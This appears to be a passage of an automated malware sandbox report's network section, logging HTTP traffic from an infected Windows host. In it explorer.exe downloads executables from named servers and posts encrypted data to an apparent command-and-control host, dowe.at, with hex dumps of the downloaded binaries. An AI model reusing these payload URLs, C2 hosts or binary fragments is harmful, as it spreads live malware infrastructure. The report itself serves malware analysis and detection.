                                                            Content-Length: 43
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 59 39 08 a6 6d 59 b5 ab 15 bd cf b5 fa 6d 86 21 da ec 71 14 10 94 8f
                                                            Data Ascii: #\(Y9mYm!q


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6192.168.2.649725123.253.32.17080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:06.509569883 CET297OUTGET /root2.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 123.253.32.170
                                                            Nov 30, 2022 00:11:06.779318094 CET299INHTTP/1.1 200 OK
                                                            Server: nginx/1.14.2
                                                            Date: Tue, 29 Nov 2022 23:11:06 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 3776000
                                                            Last-Modified: Tue, 29 Nov 2022 23:10:03 GMT
                                                            Connection: keep-alive
                                                            ETag: "6386914b-399e00"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 fa 27 a0 35 9b 49 f3 35 9b 49 f3 35 9b 49 f3 88 d4 df f3 34 9b 49 f3 2b c9 dc f3 24 9b 49 f3 2b c9 ca f3 5d 9b 49 f3 12 5d 32 f3 32 9b 49 f3 35 9b 48 f3 af 9b 49 f3 2b c9 cd f3 17 9b 49 f3 2b c9 dd f3 34 9b 49 f3 2b c9 d8 f3 34 9b 49 f3 52 69 63 68 35 9b 49 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 ac e5 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 08 01 00 00 02 3c 00 00 00 00 00 97 4c 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 4f 00 00 04 00 00 01 9d 3a 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 0a 01 00 50 00 00 00 00 c0 3c 00 50 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 2d 00 00 18 00 00 00 d8 2c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 07 01 00 00 10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 97 3b 00 00 20 01 00 00 60 38 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 50 12 00 00 c0 3c 00 00 32 00 00 00 6c 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 13
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$q'5I5I5I4I+$I+]I]22I5HI+I+4I+4IRich5IPEL`<L @ O:P<P0 -,@<.text `.data; `8@.rsrcPP<2l9@@p
                                                            Nov 30, 2022 00:11:06.779341936 CET300INData Raw: 01 00 80 13 01 00 00 00 00 00 64 0d 01 00 72 0d 01 00 90 0d 01 00 9e 0d 01 00 bc 0d 01 00 ce 0d 01 00 e0 0d 01 00 fe 0d 01 00 12 0e 01 00 24 0e 01 00 3a 0e 01 00 54 0e 01 00 66 0e 01 00 7a 0e 01 00 88 0e 01 00 9a 0e 01 00 b2 0e 01 00 c6 0e 01 00
                                                            Data Ascii: dr$:Tfz4JZhv 0FPn*@Th
                                                            Nov 30, 2022 00:11:06.779361963 CET301INData Raw: 66 00 69 00 78 00 75 00 6d 00 65 00 6e 00 61 00 6d 00 75 00 79 00 69 00 6c 00 65 00 67 00 65 00 64 00 65 00 73 00 6f 00 72 00 75 00 6a 00 75 00 20 00 72 00 61 00 62 00 61 00 78 00 61 00 6b 00 65 00 67 00 65 00 70 00 75 00 76 00 61 00 74 00 65 00
                                                            Data Ascii: fixumenamuyilegedesoruju rabaxakegepuvatehonapecahosipami bucajajulolutelizategehijijuBolhumikumiyoyamofiyopubakiyawa f
                                                            Nov 30, 2022 00:11:06.779381037 CET303INData Raw: 70 00 6f 00 6c 00 61 00 6b 00 61 00 72 00 65 00 63 00 75 00 6c 00 6f 00 70 00 6f 00 20 00 6b 00 69 00 70 00 65 00 68 00 69 00 62 00 61 00 6b 00 75 00 20 00 74 00 61 00 6d 00 69 00 76 00 6f 00 6e 00 6f 00 67 00 6f 00 00 00 62 75 67 65 70 69 63 6f
                                                            Data Ascii: polakareculopo kipehibaku tamivonogobugepicokipuwu jamexeyofopilafavusilawifezenago cekukakerozekelamoxewikofefina becup !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQ
                                                            Nov 30, 2022 00:11:06.779402018 CET304INData Raw: 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 5f 6f 6e 65 78 69 74 2f 61 74 65 78 69 74 20 74 61 62 6c 65 0d 0a 00 00 00 00 52 36 30 31 39 0d 0a 2d 20 75 6e 61 62 6c 65 20 74 6f
                                                            Data Ascii: allR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap errorR6017- unexpected multithread lock errorR6016- not enough space for thread dataThis
                                                            Nov 30, 2022 00:11:06.779421091 CET305INData Raw: 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 10 00 10 00 10 00 10 00 10 00 10 00 82 00 82 00 82 00 82 00 82 00 82 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00
                                                            Data Ascii:
                                                            Nov 30, 2022 00:11:06.779442072 CET307INData Raw: 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9
                                                            Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
                                                            Nov 30, 2022 00:11:06.779469967 CET308INData Raw: 48 80 7c 00 66 a3 4c 80 7c 00 ff 15 44 11 40 00 c3 55 8b ec 8b 45 08 8b 4d 0c 29 08 5d c2 08 00 55 8b ec 8b 45 08 8b 4d 0c 29 08 5d c2 08 00 55 8b ec 8b 45 08 8b 4d 0c 29 08 5d c2 08 00 c2 08 00 55 8b ec 51 83 65 fc 00 8b 45 10 90 01 45 fc 8b 45
                                                            Data Ascii: H|fL|D@UEM)]UEM)]UEM)]UQeEEEMUEM1]UMEEEE]UUBSVEE0Wx}x@ME 7EE MEEEEE%{3ME3MQ
                                                            Nov 30, 2022 00:11:06.779491901 CET309INData Raw: c3 ff 35 44 80 7c 00 6a 00 ff 15 90 10 40 00 a3 00 a9 7b 00 c3 55 8b ec b8 c0 18 00 00 e8 02 0a 00 00 53 56 33 db 57 33 f6 81 fe 18 0c 00 00 75 0b b8 d6 38 00 00 01 05 44 80 7c 00 81 3d 44 80 7c 00 94 13 00 00 75 0b 68 b8 17 40 00 ff 15 f4 10 40
                                                            Data Ascii: 5D|j@{USV3W3u8D|=D|uh@@F1|39D|vBV=D|u'S@PEPEPEPEPS@SS@F;5D|r?=D|eum@SSSS@SSEP@S@P(@@PS
                                                            Nov 30, 2022 00:11:06.779524088 CET311INData Raw: 6d a8 72 c4 fa 22 81 85 74 ff ff ff b4 2b 1c 5a 81 45 80 aa ec d8 54 81 6d 90 62 2e 26 46 81 45 d4 53 10 55 06 81 45 c0 04 dc 6f 4b 81 45 c0 85 bc 0d 3a 81 6d b4 be 4a a4 60 81 6d a8 07 0a 6e 61 81 45 c0 63 5d 49 0e 81 6d 8c 76 7c 48 13 81 85 74
                                                            Data Ascii: mr"t+ZETmb.&FESUEoKE:mJ`mnaEc]Imv|HtwVExLE{EnmB>mU1mm5mW=EQ+EEI@KHm|mEoE5`KE\@]KmY0E-tm ?NE(Lp/YEc
                                                            Nov 30, 2022 00:11:07.049257040 CET312INData Raw: 05 f6 ff ff 33 c0 5e c9 c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 51 8d 4c 24 04 2b c8 1b c0 f7 d0 23 c8 8b c4 25 00 f0 ff ff 3b c8 72 0a 8b c1 59 94 8b 00 89 04 24 c3 2d 00 10 00 00 85 00 eb e9 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c 00
                                                            Data Ascii: 3^QL$+#%;rY$-UEVFucFHlHhN;tytsyHpuxF;sytFsyHpuFF@puHpF@F^]UVWuMdEu3;t0;u,o


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7192.168.2.649728211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:21.272643089 CET4269OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://frwum.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 226
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:21.275320053 CET4269OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 09 6b 2c 90 f4 76 0b 75 22 25 b2 f2
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA ,[k,vu"%qp"~[9-~Yl}gy[E1!-x@:Iy3p-f[kv-7
                                                            Nov 30, 2022 00:11:22.504940033 CET4270INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:21 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8192.168.2.649729200.46.66.7180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:22.773154974 CET4271OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ifardcruc.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 341
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:22.773185968 CET4271OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5a 4a c5 af
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuZJ}\UxQJwi%dqNgt}[*_)(2<F.*]C|o@|/b9!Scoh we_e^=0
                                                            Nov 30, 2022 00:11:23.625840902 CET4272INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:23 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9192.168.2.649730211.59.14.9080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 30, 2022 00:11:24.472856998 CET4273OUTPOST /tmp/ HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://gbbshbjmpq.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 189
                                                            Host: dowe.at
                                                            Nov 30, 2022 00:11:24.473367929 CET4274OUTData Raw: 3b 6e 26 19 8c b9 1b 21 dd dc c0 74 75 03 7e cc 7b 0b bd e3 1f 73 95 63 0f 0c 7c 97 45 b4 c4 1a 98 5a c0 5f 76 6c 56 19 eb e9 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 56 1c b0 e6
                                                            Data Ascii: ;n&!tu~{sc|EZ_vlV?*$`7C[zqNA -[k,vuVSmdp5o+(qJq20`<hC6%jQBBg{uL4V-I"<X
                                                            Nov 30, 2022 00:11:25.665105104 CET4274INHTTP/1.0 404 Not Found
                                                            Date: Tue, 29 Nov 2022 23:11:25 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                            X-Powered-By: PHP/5.6.40
                                                            Content-Length: 331
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.6497395.135.247.111443C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2022-11-29 23:11:39 UTC0OUTGET /upload/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: thepokeway.nl
                                                            2022-11-29 23:11:39 UTC0INHTTP/1.1 200 OK
                                                            Date: Tue, 29 Nov 2022 23:11:39 GMT
                                                            Server: Apache
                                                            Content-Description: File Transfer
                                                            Content-Disposition: attachment; filename=850f4ace.exe
                                                            Content-Transfer-Encoding: binary
                                                            Expires: 0
                                                            Cache-Control: must-revalidate
                                                            Pragma: public
                                                            Vary: Accept-Encoding
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            Content-Type: application/octet-stream
                                                            2022-11-29 23:11:39 UTC0INData Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 fa 27 a0 35 9b 49 f3 35 9b 49 f3 35 9b 49 f3 88 d4 df f3 34 9b 49 f3 2b c9 dc f3 24 9b 49 f3 2b c9 ca f3 5d 9b 49 f3 12 5d 32 f3 32 9b 49 f3 35 9b 48 f3 af 9b 49 f3 2b c9 cd f3 17 9b 49 f3 2b c9 dd f3 34 9b 49 f3 2b c9 d8 f3 34 9b 49 f3 52 69 63 68 35 9b 49 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 25 12 99 62 00 00 00 00 00
                                                            Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$q'5I5I5I4I+$I+]I]22I5HI+I+4I+4IRich5IPEL%b
                                                            2022-11-29 23:11:39 UTC8INData Raw: 48 3a 6d 6d 3a 73 73 00 00 00 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 4d 4d 2f 64 64 2f 79 79 00 00 00 00 50 4d 00 00 41 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 63 68 00 00 00 46 65 62 72 75 61 72 79 00 00 00 00 4a 61 6e 75 61 72 79 00 44 65 63 00 4e 6f 76 00 4f 63 74 00 53 65 70 00 41 75 67 00 4a 75 6c 00 4a 75 6e 00 4d 61 79 00 41 70 72 00 4d 61 72 00 46 65 62 00 4a 61 6e 00 53 61 74 75 72 64 61 79 00 00 00 00 46 72 69 64 61 79 00 00 54 68 75 72 73 64 61 79 00 00 00 00 57 65 64 6e 65 73 64 61 79 00 00 00 54 75 65 73 64 61 79 00
                                                            Data Ascii: H:mm:ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFridayThursdayWednesdayTuesday
                                                            2022-11-29 23:11:39 UTC8INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC8INData Raw: 32 30 30 30 0d 0a 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 a0 4f 4a 00 f8 4f 4a 00 00 00 00 00 06 80 80 86 80 81 80 00 00 10 03 86 80 86 82 80 14 05 05 45 45 45 85 85 85 05 00 00 30 30 80 50 80 88 00 08 00 28 27 38 50 57 80 00 07 00 37 30 30 50 50 88 00 00 00 20 28 80 88 80 80 00 00 00 60 68 60 68 68 68 08 08 07 78 70 70 77 70 70 08 08 00 00 08 00 08 00 07 08 00 00 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f 76 44 65 63 00 00 00 00 43 4f 4e 4f 55 54 24 00 00 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: 2000ctiveWindowMessageBoxAUSER32.DLLOJOJEEE00P('8PW700PP (`h`hhhxppwppSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecCONOUT$H
                                                            2022-11-29 23:11:39 UTC16INData Raw: 53 e8 a2 2f 00 00
                                                            Data Ascii: S/
                                                            2022-11-29 23:11:39 UTC16INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC16INData Raw: 32 30 30 30 0d 0a 59 3b c6 74 07 50 e8 d8 2e 00 00 59 e8 b9 55 00 00 84 5d c4 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 db e9 ff ff 89 45 e0 39 75 e4 75 06 50 e8 19 31 00 00 e8 40 31 00 00 89 7d fc eb 35 8b 45 ec 8b 08 8b 09 89 4d dc 50 51 e8 15 54 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 fc 30 00 00 e8 1c 31 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 83 19 00 00 c3 e8 97 5c 00 00 e9 78 fe ff ff 2d a4 03 00 00 74 22 83 e8 04 74 17 83 e8 0d 74 0c 48 74 03 33 c0 c3 b8 04 04 00 00 c3 b8 12 04 00 00 c3 b8 04 08 00 00 c3 b8 11 04 00 00 c3 8b ff 56 57 8b f0 68 01 01 00 00 33 ff 8d 46 1c 57 50 e8 09 12 00 00 33 c0 0f b7 c8 8b c1 89 7e 04 89 7e 08 89 7e 0c c1 e1
                                                            Data Ascii: 2000Y;tP.YU]tMjYQPVh@E9uuP1@1}5EMPQTYYeEE}uP01EE3@eE\x-t"ttHt3VWh3FWP3~~~
                                                            2022-11-29 23:11:39 UTC24INData Raw: fa 3f 76 03 6a 3f
                                                            Data Ascii: ?vj?
                                                            2022-11-29 23:11:39 UTC24INData Raw: 0d 0a
                                                            Data Ascii:
